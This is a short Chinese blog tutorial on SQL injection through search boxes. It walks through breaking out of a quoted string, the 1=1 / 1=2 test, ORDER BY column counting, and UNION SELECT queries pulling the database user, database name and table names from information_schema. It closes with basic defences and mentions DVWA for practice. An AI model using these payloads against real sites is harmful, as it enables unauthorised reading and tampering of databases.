web漏洞
漏洞定义:漏洞是在硬件 软件协议的具体实现或系统安全策列上存在的缺陷 ,攻击者能够在未授权的情况下访问或者破环。
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
常见于搜索框,后台人员根据输入内容去进行搜索
正常写sql
搜索框内容:内容
select * from table where name='内容'
黑客写sql
搜索框内容:内容’ order by 1 # ’
select * from table where name = '内容' order by 1# '
井号用于删除后面疑似存在sql
查看是否存在sql注入
输入框:1“ and 1=1 #
select * from table where nane =”1“ and 1=1 #‘ /1=2
经过尝试1=1成功,1=2错误 则sql存在漏洞
如何利于
一般步骤:
1.判断有几列数据:
select * from table where name = ‘内容’ order by 100# ’
2。联合查询其他信息 union
select * from table where id = ”1“ union select user(),database()#’
user()当前连接用户 database()当前连接数据库名
3.根据返回数据库名进行查询
information_schema.tables 保存数据库名称和表名
select * from table where id = ”1“ union select table_name,table_schema from information_schema.tables where table_schema = "表" # ‘
4。联合查询 根据表查询基本信息
测试工具(使用方法百度)
dvwa
sql注入防御
1.输入信息过来 不允许出现特殊字符或者 sql语句
2.将输入信息加密成16进制
3.数据预处理
呕吼,简单到这了,有问题可以评论,会的话就会回复啦
版权归原作者 精致的仙女 所有, 如有侵权,请联系我们删除。